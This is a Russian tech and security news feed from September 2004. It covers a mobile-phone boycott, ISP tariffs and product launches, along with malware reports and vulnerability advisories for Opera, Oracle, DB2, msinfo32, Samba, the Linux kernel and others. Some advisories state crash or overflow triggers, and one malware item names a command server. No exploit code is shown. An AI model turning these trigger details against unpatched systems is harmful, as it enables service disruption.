Позавчера в России прошла первая общенациональная акция протеста абонентов мобильной связи. По сообщению компаний-операторов, аномального снижения уровня трафика в их сетях не наблюдалось. 2 сентября российские пользователи мобильной связи провели акцию по бойкотированию услуг операторов. Организаторы мероприятия выступили с призывом выключить мобильные телефоны на 2 часа. По сообщению организаторов, в акции приняло участие около 715 тыс. абонентов. «Нельзя сказать, что мы довольны результатами, но они есть, — рассказал CNews.ru Владимир Богаченко, президент НП «Сименс-Клуб» и один из членов оргкомитета „мобильной забастовки“. — Как минимум, одна цель акции — поднять интерес к самой проблеме - реализована. Судя по опросам на различных ресурсах, акцию поддерживает от 50 до 75% проинформированных абонентов. Самая слабая сторона акции — это реклама, очень многие, к сожалению, не знали о ней. Кроме того, свою роль также сыграли трагические события последней недели. Тема акции ушла на задний план и мы прекрасно понимаем людей в такой ситуации». Представители компаний-операторов сообщили, что существенного снижения количества соединений в сетях мобильной связи во время проведения акции отмечено не было. «Если говорить о московском регионе, то изменения в уровне трафика были настолько незначительными, что укладываются в рамки типовых колебаний. В некоторых районах было отмечено небольшое снижение трафика, в некоторых - рост. В регионах трафик в период с 12:00 начал расти, как это обычно происходит в часы деловой активности», — сообщили в пресс-службе компании «ВымпелКом». «В последние дни мы, наоборот, отмечаем увеличение трафика, что связано с трагическими событиями этих дней», — рассказал CNews.ru Роман Проколов, советник генерального директора «МегаФон-Москва». «Наша статистика не показала никакого снижения нагрузки. С 11:00 до 13:00 общий трафик в Москве был ниже на 1–2%, чем в прошлый четверг. После часа дня, наоборот, трафик на 2–3% превысил показатель прошлого четверга. Аналогичная ситуация в других городах, где была объявлена акция, — Новосибирск, Екатеринбург, Краснодар. По сравнению с прошлыми днями трафик даже вырос, — рассказал CNews.ru пресс-секретарь MTC Павел Нефедов. — Статистка нагрузки по нашей сети показывает, что акция не собрала сколько-нибудь заметного количества участников (ничтожные доли процента от общего числа абонентов). Это означает, что абоненты предпочитают разрешать свои вопросы к оператору в индивидуальном порядке, а не на митингах. Наша абонентская служба только в Москве обрабатывает 215 тыс. обращений в день. Это на 1–2 порядка больше, чем вероятное общее число участников „акции протеста“».
CNews

3/09/2004 14:16 Уязвимость в Opera
Некий Stevo опубликовал исходный код уязвимости, которая позволяет провести DoS против популярного Вэб-браузера Opera. Как написано, проверен в версии 7.23 билд - 3227.
Код эксплоита

3/09/2004 13:21 Инструмент для проверки безопасности Net-Twister
Испанец Sergio 'shadown' Alvarez анонсировал выпуск нового инстумента для автоматизирования проверки на безопасность под названием Net-Twister версии 1.0. Как пишет сам автор, помимо проверки на безопасность и обнаружения уязвимости Net-Twister использует эксплоит для найденной уязвимости. Работает как из GUI, так и из консоли. Написан на языке сценариев Python.
Net-Twister

3/09/2004 13:09 Методы защиты от DoS атак для FreeBSD 4.x и 5.x
На сайте Silverwraith опубликована статья о настройках ОС FreeBSD, которые помогут защитить сервер (или рабочую станцию) от атак типа DoS (Denial Of Service).
Статья

3/09/2004 12:19 Анонсированный "Стримом" "анлим" оказался рекламным трюком
Как указывает сайт "Независимый обзор провайдеров", анонсированный компанией "МТУ-Интел" (Москва) тарифный план "Стрим-Нео" на самом деле является не услугой неограниченного доступа, а всего лишь абонементом, - правда, сравнительно дешевым. В разделе II (примечание d) Приложения №9 к договору-оферте говорится: "Оператор имеет право уменьшить техническую скорость передачи данных по тарифным планам СТРИМ НЕО и СТРИМ НЕО+ с соответствующим уведомлением Абонента, если в течение 3-х месяцев подряд среднемесячный объем входящего трафика Абонента превышает 20 Гбайт". Таким образом, пользователям фактически предлагается абонемент на 20 Гб трафика в месяц, - что соответствует объему, потребляемому при полной нагрузке по каналу с пропускной способностью 64 kbps. Полная же загрузка предлагаемого "МТУ-Интелем" канала с даунстримом 160 kbps позволила бы абонентам потреблять за месяц около 50 Гб трафика, т.е. в 2.5 раза больше. По всей видимости, в ближайшее время, пока абонентов новой услуги еще мало, и создаваемые ими нагрузки не очень велики, это ограничение на практике употребляться не будет. Однако по мере роста числа пользователей узким местом окажется магистральная сеть компании, и данное ограничение станет актуальным. С учетом асимметричности канала (предоставляемая пропускная способность в сторону провайдера составляет 128 kbps) и упомянутого ограничения, тарифный план "Стрим-Нео" уступает по привлекательности предложениям ведущих московских Ethernet-операторов. Однако это предложение составит сильную конкуренцию небольшим ethernet-сетям, работающим по помегабайтной тарификации.
"Независимый обзор провайдера"

3/09/2004 12:05 Множественные уязвимости в Oracle
US-CERT сообщает о наличии множественных уязвимостей в популярной СУБД Oracle: Oracle Database Server, Application Server, Enterprise Manager. Уязвимости самого разнообразного вида - переполнение буфера, узвимость формата строки, внедрение SQL-строк и т.д. Судя по обилию перечисленных уязвимостей корпорация Oracle взяла пример в латании дыр с Micro$oft. Корпорацией выпущен бюллетень по безопасности #68 в PDF-формате. Соответственно, выпущены обновления уязвимых продуктов: Oracle Database 10g Release 1, version 10.1.0.3; Oracle Enterprise Manager Grid Control 10g, version 10.1.0.3; Oracle Application Server 10g (9.0.4), version 9.0.4.2.
Бюллетень по безопасности от Oracle

3/09/2004 11:38 Множественные уязвимости в DB2
NGSSoftware сообщила о многочисленных уязвимостях в DB2 Universal Database, которые могут позволить злоумышленникам провести атаку на уязвимую систему. Две уязвимости связаны с ошибкой проверки границ буфера, что может быть использовано для выполнения произвольного кода. Еще несколько уязвимостей, присутствующих в продукте, точно не определены, по крайней мере подробности, причины из-за которых возникают эти уязвимости, а также последствия успешного их использования пока не разглашаются. Сообщается, однако, что детали будут опубликованы до 1 декабря 2004. Пока известно, что уязвимы DB2 8.1 Fixpak 6, DB2 7.x Fixpak 11 и более ранние версии. Выпущен частичный патч, закрывающий две уязвимости, связанные с переполнением буфера.
Описание

3/09/2004 11:06 Уязвимость в MSINFO
Emmanouel Kellinis из Лондонского университета сообщает об обнаружении уязвимости в утилите Windows - msinfo32. Утилита msinfo (Microsoft System Information), напомним, предназначена для вывода системной информации, такой как - информация об установленном железе, драйверах, программной среде. Специалистам утилита помогает выявить конфликты в системе и получить информацию о различных компонентах. MSINFO можно запустить с дополнительными параметрами, один из которых - имя .NFO или .CAB-файла, предназначенного для загрузки, в виде msinfo32 /msinfo_file=filename. Было обнаружено, что при задании имени файла длиной более 258 символов возможна ситуация переполнения буфера. Приводится также пример перезаписи регистра кода. Как пишет сам автор, M$ была поставлена в известность 9 мая сего года, ответа пока не последовало.
Описание

3/09/2004 10:52 Игорные сайты атакованы русскими хакерами
Австралийские СМИ сообщает, что букмекерская контора «Multibet» была атакована русскими хакерами. Кибер-преступники применили традиционную схему обвала сайта с помощью затопления трафика. Владелец компании Терри Лиллис был вынужден заплатить хакерам $28 600 за восстановление работы сайта. Но этого оказалось мало, и хакеры потребовали ежемесячные выплаты в качестве страховки от дальнейших взломов, гарантируя при этом защиту от других мошенников. По словам Лиллиса, за несколько месяцев преступникам были выплачены десятки тысяч долларов. На днях сайт «Multibet» был снова атакован. Владелец компании обратился к своим русским «защитникам» за объяснениями, но те сняли с себя всю ответственность за обвал сайта. Тогда владелец «Multibet» решил обратиться к специалистам по компьютерной безопасности, и сейчас его компания платит ежемесячно $3500 американской фирме за защиту, однако уверен, что хакеры еще дадут о себе знать. Терри Лиллис заявил, что ни одна австралийская компания не смогла предложить должный уровень защиты от хакеров, и поэтому пришлось обратиться за помощью к американцам. Это говорит о больших проблемах в сфере безопасности игорных сайтов. Игорная компания «Centrebet» также сообщила об атаке русских хакеров: на этот раз они потребовали $10 000, руководство отказалось выплатить деньги и сайт рухнул, лишив компанию двух миллионов долларов.
SecurityLab

3/09/2004 10:35 Обновление Windows XP: игра в рулетку?
Установка обновления Service Pack 2 для ОС Windows XP может закончиться плачевно для каждого десятого компьютера. Тем не менее, эксперты рекомендуют не откладывать модернизацию операционной системы с целью повышения её безопасности. Согласно данным исследования, проведенного канадской консалтинговой компанией AssetMetrix, каждый 10-й корпоративный ПК, работающий под управлением ОС Windows XP, перестаёт нормально функционировать при установке обновления Service Pack 2. При этом, чем меньше размер компьютерного парка фирмы, тем выше будет процент выведенных из строя компьютеров. Специалисты AssetMetrix проанализировали данные отчетов об установке SP2 на почти 44 тыс. ПК в 350 компаниях разного размера. Средний показатель несовместимости обновления с уже установленным ПО составил 10,3%. При этом было отмечено, что в компаниях, имеющих до 100 компьютеров, была нарушена функциональность примерно у 12% машин, в то время как у крупных корпораций показатель несовместимости с обновлением для ОС составил 6,2%. Специалисты отмечают, что причина такой обратной зависимости заключается в том, что предприятия малого и среднего бизнеса с большей готовностью перевели свои ПК под управление Windows XP, в результате чего в этом секторе ОС имеет большее распространение. «Обновление SP2 для Windows XP является значительным прогрессом на пути усиления информационной безопасности на уровне настольных ПК, — отмечает Стив О’Холоран (Steve O’Halloran), управляющий директор AssetMetrix Research Labs. — Поэтому компаниям, переходящим или уже перешедшим на Windows XP, надо обязательно обеспечить совместимость с SP2 путём обновления или замены используемого ПО. Очень важно определить ПО, подлежащее модернизации, перед установкой обновления, для того чтобы минимизировать возможность возникновения проблем с нарушением функциональности ПК». Несмотря на то, что в SP2 уже обнаружены уязвимости, специалисты рекомендуют не медлить с установкой обновления. Так, 2 сентября группа US-CERT рекомендовала немедленно установить SP2. При этом специалисты организации предупреждают о необходимости предварительно заархивировать критически важные данные, а также изучить все сообщения о проблемах, связанных с установкой обновления.
CNews

3/09/2004 09:57 В Microsoft завершили работу над Media Player 10
Компания Microsoft завершила работу над новой, десятой версией программы Windows Media Player. Новый медиаплеер должен появиться на сайте Microsoft 2 сентября в 6:00 по времени тихоокеанского побережья США или в 17:00 по московскому времени. На момент подготовки данного материала на сайте Windows Media Player 10 была доступна только техническая бета-версия продукта. В Media Player 10 реализованы многочисленные нововведения. Первым в глаза бросается, конечно же, новый интерфейс. Прошлые версии Windows Media Player часто критиковали за слишком тяжеловесный и аляповатый интерфейс. В десятой версии специалисты Microsoft постарались ликвидировать этот недостаток. Впрочем, окончательные выводы можно будет делать только после проверки медиаплеера на практике. Внутренние нововведения также заслуживают внимания. В Media Player 10 появилась возможность доступа к онлайновым музыкальным магазинам, торгующим музыкой в формате WMA. Эта возможность пока доступна только американским пользователям, а среди магазинов поддерживаются Napster, Musicmatch, MusicNow, Wal-Mart Music Downloads, CinemaNow и новый сервис MSN Music. Улучшена также совместимость с портативными устройствами: медиаплеер поддерживает синхронизацию с 70 моделями портативных плееров, включая устройства на платформе Portable Media Center от Microsoft
Описание от "Компьюлента"

2/09/2004 22:35 Уязвимость в веб-сервере Apache 2.0.x
Red Hat advisory сообщает об уязвимости в модуле mod_ssl популярного веб-сервера Apache 2.0.x. Обнаруженная уязвимость может быть использована злоумышленниками для проведения DoS (Denial of Service) атаки. Проблема заключается в том, что при создании бесконечного цикла при помощи модуля mod_ssl и разрыва SSL соединения в определенный момент его выполнения, приводит к тому, что процесс практически полностью занимает процессорное время.
Подробнее

2/09/2004 22:20 Переполнение буфера в WinZip 3.x/6.x-9.x
Обнаружены многочисленные уязвимости в Winzip, некоторые уязвимости вызывают переполнение буфера и теоретически могут привести к выполнению произвольного кода на машине жертве. Вторая проблема заключается в неправильной проверке аргументов передаваемых в командной строке. При передачи специально сформированного аргумента возможно вызвать переполнение буфера, что позволит выполнить произвольной код. Уязвимости найдены в версиях WinZip 3.x, 6.x - 9.x. Компания Winzip Computing Inc. рекомендует произвести обновление WinZip до новой версии 9.0 SR-1, где данные уязвимости исправлены.
Подробнее
Страница загрузки WinZip

2/09/2004 14:45 Firebox X Edge – новое решение защиты сетей малого бизнеса
Компания Rainbow Technologies, эксклюзивный дистрибьютор WatchGuard Technologies на территории России и стран СНГ, сообщает о расширении линейки интегрированных устройств защиты сетей Firebox X серией Edge – для удалённых офисов, мобильных пользователей и предприятий малого и среднего бизнеса. Серия Firebox X Edge представлена тремя моделями – как для проводных, так и для беспроводных сетей – Firebox X5 / X5w, Firebox X15 / X15w и Firebox X50 / X50w. Устройства Firebox X Edge созданы для обеспечения надёжной защиты самых удалённых точек вычислительных сетей предприятий малого и среднего бизнеса. Использование Firebox X Edge в сочетании с устройствами Firebox X, установленными на центральном узле сети, обеспечивает комплексное централизованное управление и возможность мониторинга трафика без дополнительных затрат. Firebox X Edge обеспечивают более высокую пропускную способность, большее количество VPN-туннелей и большее количество сетевых интерфейсов, чем любое аналогичное устройство этого класса. Функции межсетевого экрана, создания VPN, обеспечения защиты беспроводных соединений, фильтрации по содержимому web-сайтов и антивирусной защиты на управляемых рабочих станциях объединены в одно интегрированное устройство. Обеспечивая полноценную фильтрацию трафика (с запоминанием состояния) и поддержку VPN, модели Firebox X Edge осуществляют более надёжную защиту сетей, чем устройства, использующие трансляцию сетевых адресов (NAT). Также, как и все устройства Firebox X, модели семейства Edge созданы на расширяемой платформе, обеспечивающей возможность модернизации любого устройства до старшей модели. Firebox X Edge – единственные в своём классе устройства, позволяющие использовать лицензионные ключи для своей модернизации, то есть для получения большей производительности, пропускной способности и функционала, имеющегося в старших моделях. Это обеспечивает лёгкое наращивание мощности устройства, поддерживаемых служб и технологий защиты без дорогостоящей замены оборудования. Встроенный Web-интерфейс и новые мастера настройки, разработанные для упрощения установки и управления, позволяют использовать устройства Firebox X Edge даже малым предприятиям или офисам, не имеющим собственных ИТ-специалистов. На рынке России оборудование появится в начале октября этого года.
Подробнее

2/09/2004 13:33 Найдена уязвимость в Microsoft Outlook Express
В почтовом клиенте Microsoft Outlook Express шестой версии обнаружена уязвимость, сообщает "Компьюлента". Как сообщается на сайте софтверного гиганта, проблема может возникать при отправке объемных сообщений большому количеству получателей. В этом случае пользователи, чьи адреса прописаны в полях "Кому" и "Копия" могут просмотреть адреса, помещенные в поле "Скрытая копия". Дыра охарактеризована корпорацией Microsoft как малоопасная.
Описание и патч

2/09/2004 12:06 Cегодня проходит всероссийская акция пользователей мобильных телефонов
Акция пользователей мобильных телефонов против политики компаний, предоставляющих услуги мобильной связи стартовала. Сегодня предлагается с 12.00 до 14.00 отключить свои телефоны. Поможет это или нет в борьбе с компаниями - покажет время (почему-то вспомнилась песня Макаревича "Только нас не замечают из-за разницы в размерах, и за это нас боятся очень маленьких, но смелых" ;)). Основные девизы акции:
1. Связь без обрывов
2. Квалифицированные ответы АС
3. "Прозрачные" тарифы
4. Номер — собственность абонента
5. Связь без ограничений
6. Тариф обратной силы не имеет
7. Создание единой базы IMEI номеров.
Вчера подобная акция была проведена в Украине, как написано на сайте в поддержку акции, планируется её повторить 14 сентября с 12 до 14. Звавтра предполагается проведение подобной акции в Молдове.
Акция в России
Акция в Украине

2/09/2004 11:43 У Microsoft Exchange Server появился «открытый» конкурент
Маленькая немецкая фирма Netline Internet Service опубликовала почтовый сервер Open-Xchange под лицензией GPL, то есть бесплатно отдала программу в общественное пользование. Open-Xchange — это очень известная и проверенная программа для организации коллективной работы, управления электронной почтой, хранения документов и контактных списков. На ее основе сделан известный почтовый сервер SuSE Linux OpenExchange Server, дистрибуцией которого занимается фирма Novell. В принципе, это самый популярный в мире почтовый сервер под Linux. Он работает во всех самых популярных операционных системах (SuSE Linux, Red Hat, Red Flag, Debian). Раньше Open-Xchange распространялся только в комплекте с SuSE OpenExchange. Теперь же, после публикации сервера под лицензией GPL, его исходный код можно будет свободно скачать прямо с сайта компании-разработчика. Это, без сомнения, тяжелый удар по главному конкуренту — компании Microsoft, которая занимается продажей программы Microsoft Exchange Server. А ведь SuSE OpenExchange позиционировался именно как дешевая альтернатива Microsoft Exchange Server. Компания Netline Internet Service собирается сконцентрироваться на совершенствовании программных средств («коннекторов») для работы Open-Xchange с клиентами под Windows. Эти «коннекторы» уже будут коммерческими, их исходный код не опубликован и остался в собственности разработчиков. Но сам сервер Open-Xchange после его опубликования под лицензией GPL навсегда останется народным достоянием.
"Вебпланета"

2/09/2004 11:29 Sun готовит Java System Application Server 8
Sun Microsystems планирует начать бета-тестирование высококачественных версий своего Java-сервера приложений в следующем месяце, а выпустить — в конце года. Стандартная и корпоративная редакции Java System Application Server 8 от Sun будут готовы к началу тестирования через (приблизительно) три недели, о чем сообщил Dennis MacNeil, менеджер линейки продуктов J2EE и сервера приложений Sun. По его же словам, версии, предназначенные для запуска бизнес-приложений, будут оснащены специальными возможностями, которые помогут избежать «падения» серверов.
NIXP

2/09/2004 11:04 Microsoft представила конкурента iTunes
Как сообщает агентство BBC, компания Microsoft представила свою версию музыкального он-лайн магазина MSN Music. Он позволит меломанам легально скачивать песни всего за 99 центов. Целые альбомы можно будет приобрести за $9,99, сообщает Microsoft. На начальном этапе пользователям предложено около 500 тыс. композиций. Пока еще неизвестно, когда данная услуга будет доступна за пределами США. Представители Microsoft заявляют, что их магазин лучше, чем iTunes компании Apple, потому что скачиваемые с помощью MSN Music файлы имеют более высокий битрейт, что улучшает качество звучания. Планируется, что полная версия MSN Music будет запущена позднее осенью.
CNews

2/09/2004 10:22 Уязвимости в ядре Linux
На сайте немецкого разработчика дистрибутива Linux - SuSE в связи с выходом обновлённой версии ядра описывается уязвимость в ядре Linux, позволяющая удалённого вызвать DoS. Как утверждается, уязвимостьприсуствует в коде kNFSd (сетевая файловая система, позволяющая удалнно монтировать разделы диска), а также в функции декодирования XDR - библиотеки программ для внешнего представления данных. Для проведения удалённой атаки необходимо от доверенного IP-адреса (с которого разрешено монтирование, естественно) послать запрос, который по размеру больше 2^31. Также в ядре устранена локальная уязвимость, позволяющая вызвать DoS через /dev/ptmx. Утверждается, что уязвимости присутствуют в ядра ветви 2.6. Возможно наличие уязвимости в ветви 2.4, однако оно не подтверждено.
Подробности

2/09/2004 10:07 Тенденции развития вредоносных программ, август 2004
Опубликован обзор вредоносных программ за август от "Лаборатории Касперского". Честно говоря, на наш взгляд самой вредносной программой было интервью, данное руководителем этой уважаемой компании в августе (поручика несло). Тем не менее, согласно статье Дмитрия Швецова, вирусного аналитика "Лаборатории", главным событием августа стало появление первой вредоносной программы для Pocket PC, получившей название Backdoor.WinCE.Brador.a. Эта утилита удаленного администрирования, умеющая принимать и исполнять различные команды, является коммерческой (предлагается приобретать клиентскую часть утилиты за деньги). Это означает, что в ближайшее время данный backdoor вполне способен получить серьезную распространенность. Также антивирусной лабораторией компании была обнаружена троянская программа Trojan.SymbOS.Mosquit.a, файл которой является игрой для сотовых телефонов, работающих под управлением операционной системы Symbian. Программа получила характеристику троянской, поскольку она, помимо своего "легального" предназначения, умеет рассылать SMS на определенные телефонные номера без ведома пользователя. Продолжает увеличиваться число новых троянских программ-шпионов. В конце августа появилось сразу семь новых вариантов Trojan.PSW.LdPinch, два новых варианта TrojanSpy.Win32.Small.q (программа ворует данные пользователя при работе с 55 различными системами электронных платежей и отправляет их автору "троянца") и довольно большое количество Trojan.PSW.Lmir (семейство "троянцев", ворующих пароли от китайской онлайновой игры Legend of Mir). В середине августа компанией Pentest была обнаружена уязвимость в WIDCOMM Bluetooth Connectivity Software, которая позволяет запускать произвольный код на атакуемом устройстве с правами текущего пользователя. Патчей, устраняющих эту уязвимость, пока нет, поэтому возможно появление программ, использующих её для своего распространения. 28 августа при помощи спамерской рассылки были распространены письма: тема письма "1", во вложении файл длиной 8 байт с именем "1.gif" или "2.gif", содержащий в себе текст "45451212". В сообщении содержится html-код, использующий Exploit.HTML.ObjData для загрузки из интернета вредоносной программы TrojanDropper.Win32.Small.kv. Такой же файл распространялся с известным червем I-Worm.Bagle. Возможно, это подготовка к выпуску новой версии I-Worm.Bagle. В прошедшем месяце была зарегистрирована эпидемия почтового червя I-Worm.Mydoom.q. Механизмы распространения данной версии червя прекратили свою деятельность 20 августа 2004 года после 21:11:11, однако остался работоспособным Backdoor.Win32.Surila.g, устанавливаемый червем на зараженный компьютер.
"Лаборатория Касперского"

2/09/2004 09:44 Обнаружена новая версия червя Bagle
Компания Panda Software зафиксировала появление в интернете очередной модификации червя Bagle. Вирус Bagle.AV распространяется по электронной почте в виде ZIP-архивов, причем вложение всегда имеет название foto или foto1. После распаковки архива на жесткий диск записываются HTML-страница и связанный с ней скрытый ЕХЕ-файл. Вредоносная программа вносит ряд изменений в реестр инфицированного компьютера и затем пытается загрузить из интернета дополнительный модуль, замаскированный под изображение в формате JPEG. В случае, если это удается, вирус активирует процедуры дальнейшего размножения. Кроме того, Bagle.AV создает в системной директории Windows файл gdqfw.exe размером 9728 байт.
Описание

2/09/2004 09:30 Компания Apple представила новый супертонкий компьютер iMac G5
Компания Apple Computer Inc. представила во вторник новый компьютер iMac G5. Все его комплектующие заключены в плоском мониторе толщиной около пяти сантиметров, сообщает Reuters. "Это самый тонкий настольный компьютер в мире", - заявил представитель компании. Дизайн нового iMac разрабатывала та же команда, которая работала с MP3-плеером iPod. В продажу новинка поступит в середине сентября, и будет представлена в двух вариантах - с 17 и 20-дюймовым монитором. К нему будут прилагаться беспроводные клавиатура и мышь. В США стартовая цена для розничной продажи составит 1299 долларов за 17-дюймовый экран и 1899 долларов за 20-дюймовый. В Европе - 1399 и 2059 евро, соответственно.
Lenta.Ru

1/09/2004 16:07 "СТРИМ Нео": наконец-то - безлимитный ADSL-тариф!
Компания "МТУ-Интел" объявила о начале нового этапа преобразований на рынке интернет-услуг. Их основой является решение о вводе безлимитного тарифа для услуги "Стрим". Абонентская плата в тарифе "СТРИМ Нео" составляет $24 в месяц. При этом пользователи получают выделенный интернет-канал со скоростью 160 Кбит/с. Для тех пользователей, которые подключатся к услуге до 1 ноября, абонентская плата по этому тарифу будет составлять всего $20 в месяц. Фактически, компания ввела принципиально новую услугу с позиционированием, отличным от базового "Стрима". Если "Стрим" - это услуга класса broadband (широкая полоса), в которой преобладающее значение имеет все же высокая скорость доступа, то основные аргументы "Стрим Нео" - это постоянное подключение к интернету, надежность связи и неограниченный неоплачиваемый трафик. По оценкам, руководства компании, "Стрим-Нео" обострит конкуренцию и в секторе коммутируемого доступа, и в сегменте домовых сетей, реально предоставляя гарантированную скорость и качество сервиса ведущего интернет-оператора. В компании считают, что новая инициатива приведет к кардинальным изменениям на рынке интернет-услуг, стимулирует значительное снижение цен и общее повышение уровня качества услуг для потребителей
Mobile-review

1/09/2004 15:33 Вирус Alets открывает "черный ход" в систему
Специалисты компании Symantec сообщают о появлении в интернете вредоносной программы Alets ("Компьюлента"). После проникновения на компьютер и активации вирус создает в директории Windows файл с именем services.exe, ссылка на который добавляется в раздел автозапуска системного реестра. Затем Alets соединяется с IRC-сервером в домене ctgbn.stellaremperor.com и входит в режим ожидания дальнейших команд от авторов. Посредством вируса злоумышленники могут завершать на инфицированном компьютере запущенные процессы, а также загружать и выполнять произвольные программы. Широкого распространения Alets пока не получил.
Описание

1/09/2004 15:24 Уязвимость в Samba
Обнаружена уязвимость в пакете Samba, предназначенного для обеспечения доступа к общим ресурсам *nix-серверов через NetBIOS-сеть (протокол Microsoft). Уязвимость присутствует в функции printer_notify_info() файла 'rpc_server/srv_spoolss_nt.c'. Windows-клиент (указывается на Windows XP SP2) может послать запрос FindNextPrintChangeNotify() без предварительной посылки FindFirstPrintChangeNotify(), что приводит к краху Samba-сервера. Уязвимость ограничена тем, что для проведения атаки необходима предварительная аутентификация на сервере, да и масштаб атаки ограничен локальной сетью (потому как ни один НОРМАЛЬНЫЙ СИСАДМИН не пустит Samba во внешнюю сеть). Производителем выпущены обновлённые версии Samba - 3.0.6 и 2.2.11.
Cтраница загрузки

1/09/2004 14:17 Уязвимость в MIT Kerberos
Обнаружена уязвимость в пакете MIT Kerberos, выпускаемом и поддерживаемом Массачусетским Технологическом Институтом (MIT). Как сообщается, из-за ошибки в библиотеке декодировки ASN.1 возможен вход приложения в бесконечный цикл, что может привести к типичной ситуации DoS. В связи с этим выпущен обновлённый пакет krb5-1.3.5, в котором уязвимость устранена. Также выпущены патчи для версий krb5-1.3.4 и krb5-1.2.7. Обновлённая версия и патчи доступны на сайте разработчиков.
Подробности

1/09/2004 12:27 В канун своего семилетия вышел nmap 3.70
Первого сентября проекту nmap исполнилось 7 лет. Новая версия 3.70 содержит ряд серьезных изменений, в частности: переписан код сканирования портов (ultra_scan пришел на смену super_scan); "port scan ping"; в процессе работы nmap прогнозирует время окончания операции; добавлены опции --max_hostgroup, --min_hostgroup, --exclude; в некоторые подсистемы добавлена возможность выполнения параллельных операций сканирования разных хостов; исправлены ошибки портирования под Windows, Solaris и *BSD.
Подробности

1/09/2004 11:09 И еще раз о проблемах с телефонами Siemens серии 65: новости с Тайваня
Судя по публикациям в Сети, вопросы ликвидации программных сбоев в работе телефонов Siemens серии 65, уже приведшие к изъятию этих мобильников из немецких розничных сетей европейских операторов T-Mobile и Vodafone пока что остаются актуальными и уже докатились до Азии. По крайней мере, на Тайване, согласно сегодняшнему сообщению The DigiTimes, компания Siemens планирует к середине сентября открыть порядка 250-300 центров поддержки для предоставления сервиса по обновлению сбойного программного обеспечения. Интересно отметить, что именно на Тайване находится OEM-производство большинства этих телефонов. Контрактные партнеры Siemens, тайваньские компании Lite-On Technology и Quanta Computer уже выступили с заявлением о том, что они по-прежнему продолжат сотрудничество с Siemens Mobile, несмотря на заявление компании о приостановке производства 65 серии. Заявление, в целом, вполне резонное, ибо программный сбой не имеет никакого отношения к аппаратной части телефонов. Из неназываемых индустриальных источников стало известно, что в настоящее время еще один тайваньский OEM-производитель, компания Compal Communications, проводит переговоры с Siemens на предмет размещения заказа на производство нового смартфона. Компания Quanta - новый партнер Siemens, в свою очередь, начнет свои первые поставки мобильников для Siemens ориентировочно в середине четвертого квартала.
Mobile-review
О продаже проблемных аппаратов в России

1/09/2004 10:45 ФБР упустило предприимчивого организатора DDoS-атак
37-летний бизнесмен из штата Массачуссетс Джей Эчуафни (Jay Echouafni), подозреваемый в организации DDoS-атак на интернет-ресурсы конкурентов, скрылся от правоохранительных органов, cообщает viruslist. По информации сайта Security Focus, сейчас Эчуафни, против которого лос-анджелесский суд выдвинул обвинения по пяти пунктам, находится в розыске. По данным следствия, исполнительный директор спутниковой телекомпании Orbit Communication Corp. Джей Эчуафни нанимал хакеров для нарушения работы трех онлайновых магазинов. Заказы Эчуафни лишили пострадавшие компании 2 млн долларов. Еще одним фигурантом дела о DDoS-атаках является 30-летний сетевой администратор хостинговой компании CIT/FooNet Огайо Пол Эшли (Paul Ashley). Следствие считает, что он был посредником между Эчуафни и хакерами при организации двух кибернападений. Кроме того, в качестве обвиняемых в деле фигурируют еще трое американцев и один гражданин Великобритании. "Это пример развивающейся тенденции: DDoS-атаки используются для ослабления конкуренции," - прокомментировали результаты расследования представители ФБР. За организацию DDoS-атак на сайты конкурентов Эчуафни заплатил Эшли 1000 долларов. Директор Orbit Communication Corp. заявил исполнителю кибернападения, что администраторы атакуемых сайтов украли часть контента с его ресурса. В свою очередь Эшли обратился к знакомым хакерам, каждый из которых был готов подключить к атаке от 3 до 10 тыс. компьютеров. Атаки начались 6 октября прошлого года. Первым нападению подвергся сайт WeaKnees.com, занимавшийся продажей цифровых видеомагнитофонов. Ресурс был недоступен в течение 12 часов. Компания Lexiconn, предоставлявшая WeaKnees.com хостинг, рекомендовала сотрудникам интернет-магазина обратиться к другой хостинг-компании - RackSpace.com. Ее услуги стоили дороже, однако эта разница в цене позволяла обеспечить более высокий уровень безопасности для WeaKnees.com. Смена хостинг-провайдера не остановила хакеров. От простых SYN-атак (на сервер посылается запрос о соединении с несуществующим адресом) они перешли к http-флуду. Хакеры создали волну запросов к графическим элементам WeaKnees.com. Результатом этого стало отключение сайта на две недели. Аналогичным образом был атакован сайт компании RapidSatellite.com. Как и WeaKnees.com после первых атак RapidSatellite.com сменила хостинг-провайдера. Им стала компания Speedera. Однако спустя три дня хакеры атаковали ресурсы Speedera и параллельно вывели из строя сайты других ее клиентов: Amazon.com и Министерства внутренней безопасности США. Атаки на RapidSatellite.com продолжились и после того, как компания еще раз сменила провайдера. В декабре Джей Эчуафни приобрел компанию CIT/FooNet и назначил Полу Эшли годовой оклад 120 тыс. долларов. Сетевой администратор нанял одного из исполнителей атак на должность эксперта по безопасности CIT/FooNet. По версии ФБР, таким образом Эшли было проще отдавать распоряжения об организации новых кибернападений на конкурентов Эчуафни. Эксперты ФБР вышли на одного из исполнителей атак, который привел их к Эшли. От Эшли агенты добрались и до Эчуафни. Он был арестован и позднее выпущен под залог в 750 тыс. долларов. Спустя некоторое время обвиняемый скрылся. По некоторым данным, сейчас он может находиться в Марокко.
Подробности

1/09/2004 10:01 Opera подпевает Windows
Под аккомпанемент растущего спроса на программное обеспечение для мобильных телефонов Microsoft разработчик альтернативного браузера затянул новую песню. В понедельник Opera Software, полтора года назад поклявшаяся, что никогда не выпустит браузер, поддерживающий операционную систему Microsoft для мобильных устройств, заявила прямо противоположное, сославшись на необычно высокий спрос на ПО со стороны производителей сотовых телефонов. «Мы вернулись на этот путь, потому что наши заказчики просят об этом, — пояснил из Осло исполнительный вице-президент по развитию бизнеса, маркетингу и стратегическим альянсам Opera Рольф Асев. — Сейчас мы впервые наблюдаем спрос на Microsoft со стороны операторов и производителей карманных устройств». Частично Асев объясняет интерес к Microsoft-совместимым браузерам тем, что Windows Mobile предназначена для производителей многофункциональных телефонов, которые составляют небольшую, но высокорентабельную часть рынка. Опрос, проведенный в этом году аналитической фирмой Canalys, показал, что на долю Microsoft приходятся всего 4% рынка смартфонов региона ЕМЕА (Европа, Ближний Восток и Африка). Здесь по-прежнему доминирует операционная система Symbian с 94% рынка смартфонов. Норвежская компания отказалась назвать производителей трубок, обращавшихся к ней за версией браузера для платформы Microsoft, но сказала, что сразу три крупных фирмы вдруг попросили такую версию, хотя раньше она была им не нужна.
ZDNet

31/08/2004 17:09 В Магадане задержана группа производителей вирусных программ
